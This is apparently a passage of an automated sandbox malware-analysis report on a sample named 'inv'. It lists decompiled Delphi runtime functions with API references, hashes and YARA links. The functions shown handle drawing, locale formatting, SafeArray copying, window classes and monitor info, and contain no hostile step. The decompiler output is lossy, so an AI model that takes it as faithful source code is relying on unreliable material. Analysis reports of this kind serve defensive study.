                                  • Opcode Fuzzy Hash: 9f7a259c81de0681f34d6b9b5f73fdfca877d5785c7660d599a12c87edb8c46d
                                  • Instruction Fuzzy Hash: F9514D70608751AFC320DF69D881B6BBBE8EF45344F84481EB9D5C7752CB39E8418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042C964, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0042C964(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L004062C8();
				_v16 = _t33;
				_push(_t92);
				_push(0x42ca7f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041C700( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x42ca86);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L004064F8();
				return _t72;
			}





















                                  0x0042c965
                                  0x0042c967
                                  0x0042c96d
                                  0x0042c979
                                  0x0042c97f
                                  0x0042c98f
                                  0x0042c996
                                  0x0042c997
                                  0x0042c998
                                  0x0042c999
                                  0x0042c99a
                                  0x0042c981
                                  0x0042c981
                                  0x0042c988
                                  0x0042c989
                                  0x0042c98a
                                  0x0042c98b
                                  0x0042c98c
                                  0x0042c98c
                                  0x0042c9a0
                                  0x0042c9a3
                                  0x0042c9a8
                                  0x0042c9aa
                                  0x0042c9ad
                                  0x0042c9ae
                                  0x0042c9b3
                                  0x0042c9b8
                                  0x0042c9b9
                                  0x0042c9be
                                  0x0042c9c1
                                  0x0042c9d6
                                  0x0042c9e2
                                  0x0042c9ea
                                  0x0042c9f7
                                  0x0042ca19
                                  0x0042ca38
                                  0x0042ca52
                                  0x0042ca5f
                                  0x0042ca66
                                  0x0042ca69
                                  0x0042ca6c
                                  0x0042ca74
                                  0x0042ca75
                                  0x0042ca78
                                  0x0042ca79
                                  0x0042ca7e

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0042C99B
                                  • 72E7ACE0.USER32(?,00000000,00000402), ref: 0042C9AE
                                  • SelectObject.GDI32(?,00000000), ref: 0042C9D1
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042C9F7
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CA19
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042CA38
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042CA52
                                  • SelectObject.GDI32(?,?), ref: 0042CA5F
                                  • 72E7B380.USER32(?,?,0042CA86,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0042CA79
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$B380DesktopWindow
                                  • String ID:
                                  • API String ID: 989747725-0
                                  • Opcode ID: a83d088e72a52128b009d9036d34a78b96bb67b0bf4aef052cd2ecbbfa9612b5
                                  • Instruction ID: cd7691b0c40c7a7f6e41b86910b11e04a66da0acd20f1ea4494e156cc043563a
                                  • Opcode Fuzzy Hash: a83d088e72a52128b009d9036d34a78b96bb67b0bf4aef052cd2ecbbfa9612b5
                                  • Instruction Fuzzy Hash: 9C311CB6A00219AFDB00DEEDCC85EAFBBBCEF09714B414569B505F7280C679AD048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C074, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0040C074(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40c33f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040BF00();
				E0040A964(__ebx, __edi, __esi);
				_t196 =  *0x44f74c;
				if( *0x44f74c != 0) {
					E0040AB3C(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040A8B4(_t43, 0, 0x14,  &_v20);
				E00403E64(0x44f680, _v20);
				E0040A8B4(_t43, 0x40c354, 0x1b,  &_v24);
				 *0x44f684 = E00407CB8(0x40c354, 0, _t196);
				E0040A8B4(_t132, 0x40c354, 0x1c,  &_v28);
				 *0x44f685 = E00407CB8(0x40c354, 0, _t196);
				 *0x44f686 = E0040A900(_t132, 0x2c, 0xf);
				 *0x44f687 = E0040A900(_t132, 0x2e, 0xe);
				E0040A8B4(_t132, 0x40c354, 0x19,  &_v32);
				 *0x44f688 = E00407CB8(0x40c354, 0, _t196);
				 *0x44f689 = E0040A900(_t132, 0x2f, 0x1d);
				E0040A8B4(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040ABEC(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403E64(0x44f68c, _v36);
				E0040A8B4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040ABEC(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403E64(0x44f690, _v44);
				 *0x44f694 = E0040A900(_t132, 0x3a, 0x1e);
				E0040A8B4(_t132, 0x40c388, 0x28,  &_v52);
				E00403E64(0x44f698, _v52);
				E0040A8B4(_t132, 0x40c394, 0x29,  &_v56);
				E00403E64(0x44f69c, _v56);
				E00403E10( &_v12);
				E00403E10( &_v16);
				E0040A8B4(_t132, 0x40c354, 0x25,  &_v60);
				_t104 = E00407CB8(0x40c354, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403EA8( &_v8, 0x40c3ac);
				} else {
					E00403EA8( &_v8, 0x40c3a0);
				}
				E0040A8B4(_t132, 0x40c354, 0x23,  &_v64);
				_t111 = E00407CB8(0x40c354, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040A8B4(_t132, 0x40c354, 0x1005,  &_v68);
					if(E00407CB8(0x40c354, 0, _t198) != 0) {
						E00403EA8( &_v12, 0x40c3c8);
					} else {
						E00403EA8( &_v16, 0x40c3b8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404190();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404190();
				 *0x44f74e = E0040A900(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040C346);
				return E00403E34( &_v68, 0x10);
			}

























                                  0x0040c074
                                  0x0040c074
                                  0x0040c075
                                  0x0040c077
                                  0x0040c07c
                                  0x0040c07c
                                  0x0040c07e
                                  0x0040c080
                                  0x0040c080
                                  0x0040c083
                                  0x0040c086
                                  0x0040c087
                                  0x0040c08c
                                  0x0040c08f
                                  0x0040c092
                                  0x0040c097
                                  0x0040c09c
                                  0x0040c0a3
                                  0x0040c0a5
                                  0x0040c0a5
                                  0x0040c0af
                                  0x0040c0be
                                  0x0040c0cb
                                  0x0040c0e0
                                  0x0040c0ef
                                  0x0040c104
                                  0x0040c113
                                  0x0040c126
                                  0x0040c139
                                  0x0040c14e
                                  0x0040c15d
                                  0x0040c170
                                  0x0040c185
                                  0x0040c190
                                  0x0040c19d
                                  0x0040c1b2
                                  0x0040c1bd
                                  0x0040c1ca
                                  0x0040c1dd
                                  0x0040c1f2
                                  0x0040c1ff
                                  0x0040c214
                                  0x0040c221
                                  0x0040c229
                                  0x0040c231
                                  0x0040c246
                                  0x0040c250
                                  0x0040c255
                                  0x0040c257
                                  0x0040c270
                                  0x0040c259
                                  0x0040c261
                                  0x0040c261
                                  0x0040c285
                                  0x0040c28f
                                  0x0040c294
                                  0x0040c296
                                  0x0040c2a8
                                  0x0040c2b9
                                  0x0040c2d2
                                  0x0040c2bb
                                  0x0040c2c3
                                  0x0040c2c3
                                  0x0040c2b9
                                  0x0040c2d7
                                  0x0040c2da
                                  0x0040c2dd
                                  0x0040c2e2
                                  0x0040c2ef
                                  0x0040c2f4
                                  0x0040c2f7
                                  0x0040c2fa
                                  0x0040c2ff
                                  0x0040c30c
                                  0x0040c31f
                                  0x0040c326
                                  0x0040c329
                                  0x0040c32c
                                  0x0040c33e

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040C33F,?,?,00000000,00000000), ref: 0040C0AA
                                    • Part of subcall function 0040A8B4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040A8D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: 0477bcef38faec6503c5203299fd22ab8c88ccbb6e6ec78dd3f49002848c6e87
                                  • Instruction ID: 994eb837987e28fbe0c85b07198a4924c8e0c4b2f4f6dcdf4059e1e6393e2f0f
                                  • Opcode Fuzzy Hash: 0477bcef38faec6503c5203299fd22ab8c88ccbb6e6ec78dd3f49002848c6e87
                                  • Instruction Fuzzy Hash: CB615235B102489BDB00FBB5C881A9E77BA9B48304F51C53BB501BB7D6CA3CDD1A8799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E5A0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E0040E5A0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040E1CC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040CF80();
					return E0040E1CC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040D3D4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040DF24(_t100);
						}
						E0040E4F8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040E514(_v788 - 1, _t115) != 0) {
								L0040D3EC();
								E0040E1CC(_v792);
								L0040D3EC();
								E0040E1CC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040E544(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040D3DC();
							E0040E1CC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040D3E4();
							E0040E1CC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                  0x0040e5a0
                                  0x0040e5ac
                                  0x0040e5b2
                                  0x0040e5b4
                                  0x0040e5be
                                  0x0040e5c5
                                  0x0040e5c5
                                  0x0040e5ca
                                  0x0040e5d8
                                  0x0040e751
                                  0x0040e758
                                  0x0040e759
                                  0x00000000
                                  0x0040e5de
                                  0x0040e5e1
                                  0x0040e5f3
                                  0x0040e5e3
                                  0x0040e5e8
                                  0x0040e5e8
                                  0x0040e602
                                  0x0040e60e
                                  0x0040e611
                                  0x0040e67e
                                  0x0040e684
                                  0x0040e685
                                  0x0040e68b
                                  0x0040e68c
                                  0x0040e68e
                                  0x0040e693
                                  0x0040e697
                                  0x0040e699
                                  0x0040e699
                                  0x0040e6a4
                                  0x0040e6af
                                  0x0040e6ba
                                  0x0040e6c3
                                  0x0040e6c6
                                  0x0040e6e2
                                  0x0040e6e9
                                  0x0040e6f4
                                  0x0040e70b
                                  0x0040e710
                                  0x0040e724
                                  0x0040e729
                                  0x0040e73c
                                  0x0040e73c
                                  0x0040e745
                                  0x0040e6c8
                                  0x0040e6c8
                                  0x0040e6c9
                                  0x0040e6cf
                                  0x0040e6d5
                                  0x0040e6d7
                                  0x0040e6d9
                                  0x0040e6dc
                                  0x0040e6df
                                  0x0040e6df
                                  0x0040e6e2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e6e2
                                  0x0040e613
                                  0x0040e613
                                  0x0040e614
                                  0x0040e616
                                  0x0040e61c
                                  0x0040e61e
                                  0x0040e62d
                                  0x0040e62e
                                  0x0040e638
                                  0x0040e639
                                  0x0040e63e
                                  0x0040e649
                                  0x0040e64a
                                  0x0040e654
                                  0x0040e655
                                  0x0040e65a
                                  0x0040e675
                                  0x0040e677
                                  0x0040e678
                                  0x0040e67b
                                  0x0040e67b
                                  0x00000000
                                  0x0040e61c
                                  0x0040e611

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E639
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E655
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040E68E
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E70B
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040E724
                                  • VariantCopy.OLEAUT32(?), ref: 0040E759
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction ID: 817a9b8dd40d9bc959f5a232768311c680acfa878775ab5ad3296b6e14a350e3
                                  • Opcode Fuzzy Hash: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction Fuzzy Hash: 795121759002199BCB21DB9ACC90BD9B3BCAF08304F4045EAF509F7282D6749F948F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042F55C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0042F55C(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x42f71d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00428CE4 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00428CE4;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040C3F4(_t94, _t95, _t109, _t111);
						}
					}
					 *0x44d9d4 = _t111;
					_t96 =  *_t111;
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040C3F4(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E00408360( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00432810(_t111);
					E0042D05C(_t111, E0041BF14( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E004032D4(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x42f724);
					return E00403E10( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x44dff0; // 0x41a2a0
						E00405910(_t86,  &_v196);
						_t95 = _v196;
						E0040B0AC(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E0040384C();
					} else {
						_t108 =  *0x42840c; // 0x428458
						if(E00403264(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E004325A4(_t94);
					}
					goto L7;
				}
			}




















                                  0x0042f55c
                                  0x0042f55c
                                  0x0042f565
                                  0x0042f569
                                  0x0042f56f
                                  0x0042f573
                                  0x0042f574
                                  0x0042f579
                                  0x0042f57c
                                  0x0042f587
                                  0x0042f589
                                  0x0042f593
                                  0x0042f608
                                  0x0042f60b
                                  0x0042f620
                                  0x0042f628
                                  0x0042f62a
                                  0x0042f62d
                                  0x0042f63e
                                  0x0042f648
                                  0x0042f648
                                  0x0042f64d
                                  0x0042f657
                                  0x0042f666
                                  0x0042f668
                                  0x0042f668
                                  0x0042f666
                                  0x0042f66d
                                  0x0042f67b
                                  0x0042f67d
                                  0x0042f68a
                                  0x0042f68c
                                  0x0042f68c
                                  0x0042f6a4
                                  0x0042f6c2
                                  0x0042f6c2
                                  0x0042f6ca
                                  0x0042f6d1
                                  0x0042f6d6
                                  0x0042f6ee
                                  0x0042f6f3
                                  0x0042f6f7
                                  0x0042f6ff
                                  0x0042f6ff
                                  0x0042f706
                                  0x0042f709
                                  0x0042f70c
                                  0x0042f71c
                                  0x0042f59e
                                  0x0042f59e
                                  0x0042f5a3
                                  0x0042f5c8
                                  0x0042f5cb
                                  0x0042f5d1
                                  0x0042f5e7
                                  0x0042f5ec
                                  0x0042f5f1
                                  0x0042f5fe
                                  0x0042f603
                                  0x0042f5ab
                                  0x0042f5ad
                                  0x0042f5ba
                                  0x00000000
                                  0x00000000
                                  0x0042f5c3
                                  0x0042f5c3
                                  0x00000000
                                  0x0042f5a3

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @
                                  • API String ID: 717780171-2766056989
                                  • Opcode ID: 9ea0887e4c339fc7bf6fec575358a914fa9a1f57f3fb6ce6082c8ed66e02ce2e
                                  • Instruction ID: bc9753e4b43e0b55ddfe2c6b98fc54ebfeecb7f93aa1a2ed74855a0c4f8646d1
                                  • Opcode Fuzzy Hash: 9ea0887e4c339fc7bf6fec575358a914fa9a1f57f3fb6ce6082c8ed66e02ce2e
                                  • Instruction Fuzzy Hash: 6A515F30A002549BDB20EB69DC41B9E77F9EF45308F90457FE845E7291DB38AD49CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B2F8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetActiveWindow.USER32 ref: 0044B30B
                                  • GetWindowRect.USER32 ref: 0044B365
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0044B39D
                                  • MessageBoxA.USER32 ref: 0044B3DE
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0044B454,?,00000000,0044B44D), ref: 0044B42E
                                  • SetActiveWindow.USER32(?,0044B454,?,00000000,0044B44D), ref: 0044B43F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  • Opcode ID: 2e9f2373b2d1683e614384e4fbb031a2174bd4015331823bc96c69af79f4a7da
                                  • Instruction ID: b1cdcdfec97c79b087993d5fa321c345473cfd06d95ab669855831bda599dcaf
                                  • Opcode Fuzzy Hash: 2e9f2373b2d1683e614384e4fbb031a2174bd4015331823bc96c69af79f4a7da
                                  • Instruction Fuzzy Hash: 88411B75E00108AFEB04DFA9DD86FAEB7F9EB48304F55446AF500EB395D678AD008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421E68, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00421E68(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x44f924 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00405F88();
						}
						_t24 = 1;
					}
				} else {
					 *0x44f908 = E00421B38(4, _t23,  *0x44f908, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                  0x00421e71
                                  0x00421e74
                                  0x00421e7e
                                  0x00421ea3
                                  0x00421eab
                                  0x00421ecb
                                  0x00421ed0
                                  0x00421edb
                                  0x00421ee6
                                  0x00421ef0
                                  0x00421ef1
                                  0x00421ef2
                                  0x00421ef3
                                  0x00421ef4
                                  0x00421ef5
                                  0x00421eff
                                  0x00421f01
                                  0x00421f09
                                  0x00421f0a
                                  0x00421f0a
                                  0x00421f0f
                                  0x00421f0f
                                  0x00421e80
                                  0x00421e92
                                  0x00421e9f
                                  0x00421e9f
                                  0x00421f19

                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 00421E99
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00421EC0
                                  • GetSystemMetrics.USER32 ref: 00421ED5
                                  • GetSystemMetrics.USER32 ref: 00421EE0
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00421F0A
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
